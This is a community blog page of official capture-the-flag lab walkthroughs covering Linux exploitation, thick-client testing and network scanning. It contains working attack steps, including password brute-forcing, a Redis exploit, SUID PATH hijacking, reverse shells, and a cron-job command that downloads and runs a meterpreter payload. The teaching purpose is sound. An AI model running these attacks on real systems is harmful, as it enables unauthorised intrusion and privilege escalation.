challenges & scenarios

8 Topics

The Human Connection Challenge Lab 4: Linux Official Walkthrough Guide
Time’s Up! Congratulations to everyone who completed Lab 4: Linux from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. Throughout this walkthrough, placeholders will be used for target IPs in brackets, such as <Kali IP> or <Target IP>. Simply replace this with the actual IP of your Kali instance or the specific target. With all that considered, let's get started. Overview This challenge is in no way linear and you could start with any of the targets listed in the Machines panel. This walkthrough will attack them in order, but it’s up to you which one you try first! For privilege escalation techniques, I won’t go through each enumeration step (to keep this walkthrough from being 70 pages long!). I’ll simply talk through the technique that helped escalate privileges. Target 1 First thing’s first, as with any pen test, Nmap! nmap -Pn -sVTC -p- <Target 1 IP> Here’s a breakdown of the flags used in this command: -Pn: Skip ping scanning -sVTC: Service (V)ersioning, (T)CP scanning, Default S(C)ripts -p-: All ports (1-65535) Scanning all ports reveals that a Redis server is running version 4.0.1 on the target host. Since you have a version number, the next step is to identify any public exploits you could use. A quick Google search for the version reveals there is a Metasploit module available for this. First, fire up Metasploit as root with: sudo msfconsole Then, set all the necessary parameters needed for the exploit: set srvhost <Kali IP> set lhost <Kali IP> set rhosts <Target 1 IP> Then simply run the module. Since the module was successful, you’ll get a connection back to your Kali machine’s listener. Dropping into a shell reveals that you are root, and you can read the token to complete the first Target. Target 2 Initial access Back to square one. Since you don’t know anything about the second target, you must Nmap it and see what services it’s running. nmap -Pn -sVTC -p- <Target 2 IP> Since the only running service is SSH and the version doesn’t look like it would be vulnerable to any known exploits, you can attempt to connect to it and hope to gather more information. ssh <Target 2 IP> The SSH banner mentions the system is “reserved for john and friends”. Even though you aren’t friends with john, you now know that “john” is a valid system user so you can attempt a dictionary attack against this user. hydra -l john -P /usr/share/wordlists/metasploit/burnett_top_500.txt ssh://<Target 2 IP> The dictionary attack will reveal a valid password, trustno1. You can now use this password to log in as john over SSH and get the low-level token. ssh john@<Target 2 IP> Privilege escalation Now that you have access to the target, you can attempt to escalate your privileges. One of the methods is to find SUID binaries owned by root. These are binaries that can be executed with the privileges of their owner. If you can find one that uses another binary from the $PATH variable, you could exploit this behavior to escalate your privileges. find /usr/local/bin -perm -4000 Checking for SUID binaries reveals /usr/local/bin/ls-lh. After dumping the strings of this binary, you can see that it uses ls from $PATH. This is extremely dangerous, as any user could escalate privileges by creating a binary called ls, adding it to a writable directory, and exporting their PATH to first contain this directory before anything else. And that’s precisely what you’ll do to exploit this! First, create a file in /tmp called ls.c. touch /tmp/ls.c Then, add the following code that will spawn bash when run: #include <stdlib.h> int main(){ system("/bin/bash"); } Finally, compile this to /tmp/ls, add /tmp as the first location of the PATH variable, and run the original SUID binary. gcc -o /tmp/ls /tmp/ls.c export PATH=/tmp:$PATH ls-lh /root Target 3 Initial access Again, start with an Nmap scan to see what services are running on the target host. nmap -Pn -sVTC -p- <Target 3 IP> You can see from the output that the target is running an Apache webserver titled anna’s website. You can extend your Nmap command to run all HTTP scripts that don’t attempt brute forcing or DoS-ing against the target and try to uncover more information. nmap -Pn -sVTC --script="http* and not(brute or dos)" <Target 3 IP> This reveals that the target is running webdav. However, the status code returned is 401, which means you need valid credentials to access this. You know the username is anna, you just need to find the password. hydra -l anna -P /usr/share/wordlists/metasploit/burnett_top_500.txt -f <Target 3 IP> http-get /webdav This command reveals the password 123456. Unfortunately, your Kali instance doesn’t have a webdav client such as cadaver, but creativity is part of a pen tester’s job! Instead, use Metasploit’s windows/http/xampp_webdav_upload_php to get a reverse shell. Even though the target is Linux, this will still work because it uploads PHP. However, while the exploit is running, you must access the uploaded file manually to trigger it. use windows/http/xampp_webdav_upload_php set rhosts <Target 3 IP> set filename shell.php set username anna set password 123456 exploit Once the exploit module is triggered, you can access the uploaded file from a different terminal: wget http://anna:123456@<Target 3 IP>/webdav/shell.php And, of course, this triggers the reverse shell and you get a connection back to your Metasploit listener. Privilege escalation Checking crontab, you can see there is a recurring job run by root that clears webdav. The permissions on this file allow it to be modified by anyone. At this point, you could, in theory, just make it read the root token into a world-readable file and finish the challenge. But did you really hack it if you don’t have interactive access? First, generate a reverse shell using msfvenom: msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f elf > shell.elf Then, serve it using Python: sudo python -m http.server 80 Then, set up your Metasploit listener (since the port is 443, remember to run Metasploit as root): use multi/handler set payload linux/x64/meterpreter/reverse_tcp set lport 443 set lhost <Kali IP> exploit And finally, you can modify the file run by the cron job to trigger your exploit. echo “wget http://<Kali IP>/shell.elf; chmod +x shell.elf; ./shell.elf” > /tmp/clear-dav.sh Once the job is triggered, it first downloads the file from your HTTP server. Then, you get a connection back to your Metasploit listener. Tools For this challenge, you’ll use a range of tools including: Nmap Metasploit Python GCC Hydra Tips When testing for vulnerabilities, remember that vulnerabilities may reside in any part of the target infrastructure. Subtle elements that appear unimportant could prove exploitable. So make sure you leave no stone unturned and check every single aspect of the target server. To learn more about some of the tools used in this lab, take a look at the following collections: Moving Around Secure Testing: Beginner Credential Access Privilege Escalation: Linux Introduction to Metasploit Conclusion The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below! I hope you enjoyed the challenge and are looking forward to the next one, after which I’ll share another walkthrough guide!
StefanApostol
17 days ago Place The Human Connection Blog
1.2KViews
1like
33Comments
Human Connection Challenge Lab 6: Thick Client Applications Walkthrough Guide (Community Version)
Time’s Up! Congratulations to everyone who completed Lab 6: Thick Client Applications from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. Throughout this walkthrough, placeholders will be used for target IPs in brackets, such as <Kali IP>, <API IP>, or <Thick Client IP>. Simply replace this with the actual IP of your Kali instance or the specific target. Let's get started! Begin this challenge by setting up your Thick Client application with the API’s IP address. Go to the Remote Data Browser folder , right-click configuration.conf, then click Open with Notepad, and replace the original <IP:5000> with <API IP> or <API IP:80>. Task 1 Task 1 requires you to input a token that you’re meant to receive after you first log in to the Remote Data Browser application with the username and password provided in the Credentials panel. However, after logging in, the application doesn’t present any token. Under normal circumstances, when testing Thick Client applications, you’d have tools like ProcMon running while using the application to check for interactions with the file and operating system. In this lab, however, you can simply go back to the Remote Data Browser application’s folder. You’ll see that a token file has been created. Open it to find the token. Task 2 The second task asks for an admin token. However, you can’t access any admin panel through the application’s interface, meaning the role is set on login. First, open Burp Suite Community on your Thick Client machine. Then, set your System Proxy as follows: Go to Proxy settings > Manual proxy setup Toggle Use a proxy server to "on" Set the IP address as 127.0.0.1 Set the port as 8080 After everything is set up, turn on the Intercept feature of Burp Suite and log back into the application. On the login request, right click anywhere in the request panel and click Do intercept > Response to this request. This will result in a successful authentication response. It contains a JWT token that can be used in subsequent requests, the username that was used, and the current user’s role. From the response, you can assume that the API doesn’t tie the role to the session and instead sends it as a parameter to the application. The application then evaluates the role and presents the user with the appropriate panels. Now you can change the role in the response from user to admin. This will reveal a token in the Remote Data Browser application. Task 3 The final task asks for “the secret token in management”. Again, the application doesn’t offer this option. Clicking any of the vehicles, however, results in a Burp Suite request. The application sends this request to the server when selecting the truck option, along with the JWT received during the login phase. Since the vehicle parameter is the only one, you should focus on it for your final challenge. Adding an extra quote (‘) to the vehicle parameter returns the error “SQL query failed”. You can now safely assume this is vulnerable to SQL injection. Copy the original request into a file, retrieve.sqlmap, in your Kali box, and run sqlmap as follows: sqlmap -l retrieve.sqlmap --dump After hitting ENTER a few times (accepting SQLmap’s default options), you’ll be presented with your final token. Tools For this challenge, you’ll use a range of tools including: Burp Suite SQLMap Kali Tips When testing for Thick Client application vulnerabilities, remember that vulnerabilities may reside in any part of the application. Subtle elements that appear unimportant could prove exploitable if they don’t handle inputs securely. So make sure you check all user input forms and any buttons that direct you to different parts of the application. Although not required for this lab, you should always monitor operating and file system interactions and attempt to decompile the app to uncover all possible attack vectors. To learn more about some of the tools used in this lab, take a look at the following collections: Windows Basics Burp Suite Basics SQL Injection Conclusion The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below! I hope you enjoyed the challenge and are looking forward to the next one, after which I’ll share another walkthrough guide!
StefanApostol
3 months ago Place The Human Connection Blog
283Views
2likes
4Comments
Human Connection Challenge: Season 1 – Scanning Walkthrough Guide (Official Version)
Time’s Up! Congratulations to everyone who completed Lab 2: Scanning from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab, based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! The goal is to learn, and I hope these notes help clarify any steps and reinforce key concepts for the next challenge. This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. I’ve also used placeholders in some of the commands that would give away an answer directly, so if you see anything enclosed in angle brackets, such as <name server>, please make sure you replace it with the actual value, such as nameserver. With all that considered, let's get started. Overview Task: Identify the name server records of tinytown.bitnet. 1. What is the IP of the first name server for tinytown.bitnet? You’ll first need to open a Terminal on the Kali desktop. Next, you’ll need to query the DNS Server IP (found in the Machines panel) about the tinytown.bitnet domain using the nslookup (Name Server Lookup) tool. You’re specifically looking for NS (Name Server) records, so you can use the -type=ns parameter with nslookup to specify this: nslookup -type=ns tinytown.bitnet [DNS Server IP] The output of this command will return two name servers for the domain labelled with 1 and 2. Your next step is to identify what IP address is associated with the first name server (1). To do this, you can use nslookup along with the name server, domain, and DNS Server IP: nslookup <name server>1.tinytown.bitnet [DNS Server IP] This command will then return an IP address for the name server. 2. What is the IP of the second name server for tinytown.bitnet? As you’ve already identified both name servers, you’ll just need to run the previous command, except with the second (2) name server: nslookup <name server>2.tinytown.bitnet [DNS Server IP] You’ll then find the IP address associated with it. Task: Identify port service information for Target 1. 3. What service version is running on port 53? A network scanning tool like Nmap can help you identify the service version running on a specific port. To do this with Nmap, you can use the -sV option for service detection: nmap -sV [Target 1 IP Address] The output will show what service version is running on port 53. 4. What is the full service banner of port 22? There are a couple of ways to find the full service banner of port 22 – such as with Nmap or Netcat. If you’re using Nmap, you can modify the previous command to include the “banner” script along with the port number: nmap -sV -script=banner [Target 1 IP Address] -p22 The command line will then display the service banner from port 22. You can alternatively use netcat to manually connect to the SSH server. When a client connects, Netcat may present a banner that contains version information. To use Netcat, you’ll need the nc command along with the Target 1 IP address and specify you want to connect to port 22: nc [Target 1 IP Address] 22 When you run this command, the banner appears before the terminal hangs. Task: Identify a token on one of the ports. 5. What is the token? With the previous Nmap command, you initially found that three ports were open on Target 1. However, you’ll need to do a more thorough network scan to find another open port, one not initially found with the previous scans. To do this, you can expand your port scan to cover a much wider range by using Netcat to scan for open ports from 1 through 9000: nc -zvn <Target 1 IP Address> 1-9000 Here, -z will scan for listening services but won’t send any data, -v is verbose mode, which provides more detailed information, and -n tells Netcat not to resolve hostnames via DNS. This command will reveal a fourth open port. Now, you can use Netcat to connect to this port: nc <Target 1 IP Address> <open port> The token will then be displayed in the terminal. Task: Scan the TLS configuration on Target 2. 6. How many protocols are enabled? To scan for SSL/TLS configurations, you can use the sslscan tool. By default, sslscan scans port 443 and will return supported server ciphers, certificate details, and more. You can use sslscan like this: sslscan <Target 2 IP Address> The returned output will be verbose, but you can find and count the number of enabled protocols under the SSL/TLS Protocols subheading. 7. Name an enabled protocol. Using the previous output, name one of the enabled protocols. 8. What exploit are the protocols NOT vulnerable to? Using the same output, scroll down through the results until you find a subheading that’s named after a vulnerability and contains a similar string to: <Protocol> not vulnerable to <vulnerability name> The vulnerability has the same name as the subheading. Task: Identify and extract information from an SMB share on Target 3. 9. What Disk shared directory can you access? To extract information from an SMB (Server Message Block) share, you can use the smbclient tool. First, you’ll need to list the SMB shares on the target using the -L flag (the list/lookup option) with: smbclient -L //<Target 3 IP> You’ll then be prompted for a password, but you can press Enter to skip this. A list of SMB shares will then be displayed, three of which are shown to be a Disk type, so you know the answer will be one of these. You can now begin to go through the list and try to connect to the shares with: smbclient //<Target 3 IP>/<Sharename> However, this time when you’re prompted for a password and you press Enter, you might encounter a message when you try and connect to a share: NT_STATUS_ACCESS_DENIED If you attempt to connect to all shares, you’ll find you can connect to one share without a password. You’ll then be greeted with the following prompt to show the successful connection: smb: \> 10. What is the token stored in the directory? Now that you’re connected, you can execute commands to interact with the SMB share. If you run ls, you’ll find a token.txt file in the current directory. You can then download the file from the share onto your local machine with: get token.txt On the Kali desktop, open the Home folder and the token.txt will be inside. Open this file and find the token. 11. What is the username stored in the directory? After you’ve run ls in the SMB share, you’ll find not only token.txt, but also a file named creds.txt. Use the same command as you just did previously to download the file onto your machine: get creds.txt This file will also be downloaded to the Home folder, where you can find a username and password. Task: Identify open services on Target 3. Task: Connect to Target 3 with the previously found credentials. 12. What is the token stored in the user's /Documents directory? For this final task, you first need to scan the target using Nmap. You’ll find that if you attempt to scan the target without using the -Pn flag, you’ll get a response saying that the host seems down. However, if you run Nmap with -Pn, you’ll find some ports are open: nmap -Pn <Target 3 IP Address> However, the ports returned from this command don’t offer a way to connect to the target. You’ll also need to scan the 6000 most popular ports: nmap -Pn --top-ports 6000 <Target 3 IP Address> These results will now show two additional ports are open regarding the Web Services Management (Wsman) protocol, which is used to communicate with remote machines and execute commands. One of the tools that implement this protocol is Windows Remote Management (WinRM) which is Microsoft’s implementation of Wsman. Knowing this, you can now use Metasploit to interact with the target. In your terminal, run: msfconsole Once loaded, you can use the the following auxiliary module to connect to a system with WinRm enabled and execute a command with: set cmd ls You’ll then need to set the following options, using the credentials you found in the creds.txt file: set username <username> set password <password> set rhosts <Target 3 IP Address> Next, you need to set the cmd option with the command you want to run. If you use the ls command, you’ll be able to find what out files are in the directory you connect to: set cmd ls With all the options set, you can now run the module: run The results of the executed command will be printed on the screen and also saved to a directory, but both show the existence of a token.txt file in the current directory. You can now set the cmd option to type token.txt in Metasploit: set cmd type token.txt Once set, use the run command to send the updated command: run The contents of token.txt will then be displayed on the screen and outputted to a file. Tools For this challenge, you’ll use a range of tools including: Nslookup Nmap Netcat Sslscan Smbclient Metasploit Tips You can use different tools and parameters within those tools to scan for and find information, so don’t be afraid to try out a few different things! If you want to learn more about some of the tools within this lab, take a look at the following collections: Reconnaissance Nmap Infrastructure Hacking Introduction to Metasploit Post Exploitation with Metasploit Conclusion The steps I’ve laid out here aren’t the only way to find the answers to the questions, as long as you find the answer, you did it – well done! If you found another way to find some of these answers and think there’s a better way to do it, please post them in the comments below! I hope you enjoyed the challenge and I’ll see you for the next one.
BethHolden
5 months ago Place The Human Connection Blog
1KViews
4likes
4Comments
Cyber Countdown: Day 4
Throughout December we are unwrapping, fresh content, celebrating this year’s successes, and gifting you with the tools and insight you need to be ready for 2025. Today's Lab is Return to Haunted Hollow: Haunted Helpdesk and today's Sim is The Flashpoint Podcast – Orchid Investments.
KieranRowley
7 months ago Place Cyber Countdown
89Views
2likes
0Comments
The Human Connection Challenge Lab 1: Basic OS Skills – Walkthrough Guide (Community Version)
This is a walkthrough guide written by one of our community members, who offered to give their perspective on the challenge. Interestingly, they approached this challenge by completing some of the tasks in the graphical user interface (GUI) instead of the command line.
udhav
8 months ago Place The Human Connection Blog
813Views
2likes
1Comment
The Human Connection Challenge Lab 1: Basic OS Skills - Walkthrough Guide (Official Version)
In this walkthrough, I'll share some strategies for efficiently completing the lab, based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! The goal is to learn, and I hope these notes help clarify any steps and reinforce key concepts for the next challenge.
BethHolden
8 months ago Place The Human Connection Blog
1.1KViews
1like
0Comments
Introducing The Human Connection Challenge: Season 1
Starting today we will begin releasing a series of all-new Challenge Labs. Each month you’ll be given the chance to showcase your cybersecurity skills across a range of topics and climb the Season 1 Leaderboard, with the chance to win kudos and rewards along the way.
KieranRowley
8 months ago Place The Human Connection Blog
2.7KViews
6likes
26Comments
Face Your Fears this Halloween and Return to Haunted Hollow
🧛‍♀️ Brace yourselves, brave souls! The haunted season has returned, and with it, an all-new cybersecurity adventure—Halloween 2024: Return to Haunted Hollow. The sinister spirits of cyberspace await you in this terrifying sequel to our 2023 Halloween collection, The Haunted Hollow. This is no mere challenge—it’s an eerie expedition through 9 haunted labs designed to test your skills and sanity alike. Whether you're a seasoned crypt keeper of the cybersecurity world or a curious newcomer, there's a fright waiting for everyone in this immersive capture-the-flag experience! 🔮 From unraveling encrypted secrets to hunting ghosts in packet captures, every lab holds the key to defeating the horrors lurking within. Can you escape the Haunted Helpdesk, break the Encryption Enigma, or uncover the Spooky, Scary, Silly Snaps? Each step you take deeper into this digital graveyard will challenge your mind and test your courage, until you can break out of the park through the Emergency Exit! 🕷️ With a difficulty ranging from approachable to spine-chillingly tough, it’s not about conquering all the horrors—just enough to emerge from the shadows with your sanity intact. Gather your wits, grab your digital lantern, and get ready to explore the most terrifying corners of cyber horror! 🧛 Release Date: October 16th ⌛ Estimated Time to Complete: 5 hours 👻 Labs: 9, each more terrifying than the last 🎃 Difficulty Range: 2-6 🧟 Collection Type: Challenge Lab details Note: These labs can be completed in any order, but we have ordered them from most accessible to most challenging. The final lab can only be completed after the other labs have been completed. The prequel collection doesn’t need to be completed before you can dive into these labs, but if you're craving some extra chills and thrills, feel free to haunt them first! Phishing for Treats Difficulty: 2 Skills required: None – this lab should be accessible to all audiences What's involved: This lab is a new phishing emails lab, with Halloween-themed emails. Users have to identify whether the email is 'safe' or 'spam' based on indicators from the emails. PCAP Pandemonium Difficulty: 4 Skills required: Packet capture analysis (Wireshark) What's involved: In this lab, users will need to analyse multiple packet captures using Wireshark to identify answers to the questions from the network traffic. Delving Deeper Difficulty: 4 Skills required: Web application enumeration What's involved: Users will need to explore a web application in order to gain access to a computer terminal within the application. From there, they'll need to interact with a simple API. Encryption Enigma Difficulty: 5 Skills required: Modern encryption/encoding techniques (Knowledge of how to use CyberChef will be useful) What's involved: Users will need to identify the correct encoding and encryption technique used to obfuscate each message in an application, before decrypting/decoding each message. Confusing Code Difficulty: 5 Skills required: Linux enumeration techniques, reverse engineering (particularly using Ghidra) What's involved: Users will need to use Linux enumeration techniques to identify a binary, before reverse engineering that binary to figure out how to exploit it. Haunted Helpdesk Difficulty: 5 Skills required: Linux enumeration and privilege escalation techniques What's involved: Users will be dropped into a restricted environment. From there, they'll need to figure out how to escape, and escalate their privileges to root. Fearsome Forensics Difficulty: 6 Skills required: OSINT, web application enumeration, modern encryption techniques, steganography What's involved: In this lab, the user will need to explore the web application and discover clues using OSINT techniques. These clues will then be used to decipher encrypted messages, finally revealing how to extract a message hidden inside an image. Spooky, Scary, Silly Snaps Difficulty: 6 Skills required: AWS capabilities (particularly S3 and AWS permissions), Python scripting What's involved: Users will need to enumerate public S3 resources to identify credentials for an AWS account. From here, they'll need to interact with the AWS console, and identify a way of escalating their privileges on AWS. Emergency Exit Difficulty: 1 Skills required: None – this lab is a culmination of the preceding labs within the collection, but no specific skills are required to complete this lab. What's involved: In each of the labs in this collection, users would have been asked to make a note of a code. In this lab, they need to submit each of these codes. Share Your Thoughts Did you escape the Haunted Hollow? We'd love to hear from you! Remember you can post in our Help & Support Forum for hints, tips & collaboration from your fellow community of experts.
NyePrior
9 months ago Place The Human Connection Blog
1KViews
12likes
17Comments

"}},"componentScriptGroups({\"componentId\":\"custom.widget.Analytics\"})":{"__typename":"ComponentScriptGroups","scriptGroups":{"__typename":"ComponentScriptGroupsDefinition","afterInteractive":{"__typename":"PageScriptGroupDefinition","group":"AFTER_INTERACTIVE","scriptIds":[]},"lazyOnLoad":{"__typename":"PageScriptGroupDefinition","group":"LAZY_ON_LOAD","scriptIds":[]}},"componentScripts":[]},"component({\"componentId\":\"custom.widget.Custom_Scripts\"})":{"__typename":"Component","render({\"context\":{\"component\":{\"entities\":[],\"props\":{}},\"page\":{\"entities\":[],\"name\":\"TagPage\",\"props\":{},\"url\":\"https://community.immersivelabs.com/tag/challenges%20%26%20scenarios\"}}})":{"__typename":"ComponentRenderResult","html":""}},"componentScriptGroups({\"componentId\":\"custom.widget.Custom_Scripts\"})":{"__typename":"ComponentScriptGroups","scriptGroups":{"__typename":"ComponentScriptGroupsDefinition","afterInteractive":{"__typename":"PageScriptGroupDefinition","group":"AFTER_INTERACTIVE","scriptIds":[]},"lazyOnLoad":{"__typename":"PageScriptGroupDefinition","group":"LAZY_ON_LOAD","scriptIds":[]}},"componentScripts":[]},"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"components/community/NavbarDropdownToggle\"]})":[{"__ref":"CachedAsset:text:en_US-components/community/NavbarDropdownToggle-1751898025000"}],"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"components/messages/MessageListTabs\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageListTabs-1751898025000"}],"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"components/messages/MessageView/MessageViewInline\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageView/MessageViewInline-1751898025000"}],"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"shared/client/components/common/OverflowNav\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/common/OverflowNav-1751898025000"}],"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"components/users/UserLink\"]})":[{"__ref":"CachedAsset:text:en_US-components/users/UserLink-1751898025000"}],"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"components/messages/MessageSubject\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageSubject-1751898025000"}],"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"components/messages/MessageBody\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageBody-1751898025000"}],"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"components/messages/MessageTime\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageTime-1751898025000"}],"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"shared/client/components/nodes/NodeIcon\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/nodes/NodeIcon-1751898025000"}],"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"components/messages/MessageUnreadCount\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageUnreadCount-1751898025000"}],"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"components/messages/MessageViewCount\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageViewCount-1751898025000"}],"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"components/kudos/KudosCount\"]})":[{"__ref":"CachedAsset:text:en_US-components/kudos/KudosCount-1751898025000"}],"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"components/messages/MessageRepliesCount\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageRepliesCount-1751898025000"}],"cachedText({\"lastModified\":\"1751898025000\",\"locale\":\"en-US\",\"namespaces\":[\"shared/client/components/users/UserAvatar\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/users/UserAvatar-1751898025000"}]},"Theme:customTheme1":{"__typename":"Theme","id":"customTheme1"},"User:user:-1":{"__typename":"User","id":"user:-1","entityType":"USER","eventPath":"community:dnvaw96485/user:-1","uid":-1,"login":"Anonymous","email":"","avatar":null,"rank":null,"kudosWeight":1,"registrationData":{"__typename":"RegistrationData","status":"ANONYMOUS","registrationTime":null,"confirmEmailStatus":false,"registrationAccessLevel":"VIEW","ssoRegistrationFields":[]},"ssoId":null,"profileSettings":{"__typename":"ProfileSettings","dateDisplayStyle":{"__typename":"InheritableStringSettingWithPossibleValues","key":"layout.friendly_dates_enabled","value":"true","localValue":"true","possibleValues":["true","false"]},"dateDisplayFormat":{"__typename":"InheritableStringSetting","key":"layout.format_pattern_date","value":"MM-dd-yyyy","localValue":"MM-dd-yyyy"},"language":{"__typename":"InheritableStringSettingWithPossibleValues","key":"profile.language","value":"en-US","localValue":null,"possibleValues":["en-US","es-ES"]},"repliesSortOrder":{"__typename":"InheritableStringSettingWithPossibleValues","key":"config.user_replies_sort_order","value":"DEFAULT","localValue":"DEFAULT","possibleValues":["DEFAULT","LIKES","PUBLISH_TIME","REVERSE_PUBLISH_TIME"]}},"deleted":false},"CachedAsset:pages-1751868379931":{"__typename":"CachedAsset","id":"pages-1751868379931","value":[{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"BlogViewAllPostsPage","type":"BLOG","urlPath":"/category/:categoryId/blog/:boardId/all-posts/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"CasePortalPage","type":"CASE_PORTAL","urlPath":"/caseportal","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"CreateGroupHubPage","type":"GROUP_HUB","urlPath":"/groups/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"CaseViewPage","type":"CASE_DETAILS","urlPath":"/case/:caseId/:caseNumber","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"InboxPage","type":"COMMUNITY","urlPath":"/inbox","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"HelpFAQPage","type":"COMMUNITY","urlPath":"/help","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"IdeaMessagePage","type":"IDEA_POST","urlPath":"/idea/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"IdeaViewAllIdeasPage","type":"IDEA","urlPath":"/category/:categoryId/ideas/:boardId/all-ideas/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"LoginPage","type":"USER","urlPath":"/signin","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"WorkstreamsPage","type":"COMMUNITY","urlPath":"/workstreams","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"BlogPostPage","type":"BLOG","urlPath":"/category/:categoryId/blogs/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"ThemeEditorPage","type":"COMMUNITY","urlPath":"/designer/themes","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"TkbViewAllArticlesPage","type":"TKB","urlPath":"/category/:categoryId/kb/:boardId/all-articles/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"OccasionEditPage","type":"EVENT","urlPath":"/event/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"OAuthAuthorizationAllowPage","type":"USER","urlPath":"/auth/authorize/allow","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"PageEditorPage","type":"COMMUNITY","urlPath":"/designer/pages","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"PostPage","type":"COMMUNITY","urlPath":"/category/:categoryId/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"ForumBoardPage","type":"FORUM","urlPath":"/category/:categoryId/discussions/:boardId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"TkbBoardPage","type":"TKB","urlPath":"/category/:categoryId/kb/:boardId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"EventPostPage","type":"EVENT","urlPath":"/category/:categoryId/events/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"UserBadgesPage","type":"COMMUNITY","urlPath":"/users/:login/:userId/badges","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"GroupHubMembershipAction","type":"GROUP_HUB","urlPath":"/membership/join/:nodeId/:membershipType","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"MaintenancePage","type":"COMMUNITY","urlPath":"/maintenance","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1751868379931,"localOverride":null,"page":{"id":"I